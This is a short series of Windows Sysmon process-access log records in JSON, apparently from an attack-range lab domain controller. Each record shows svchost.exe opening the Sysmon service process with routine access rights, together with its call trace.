{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
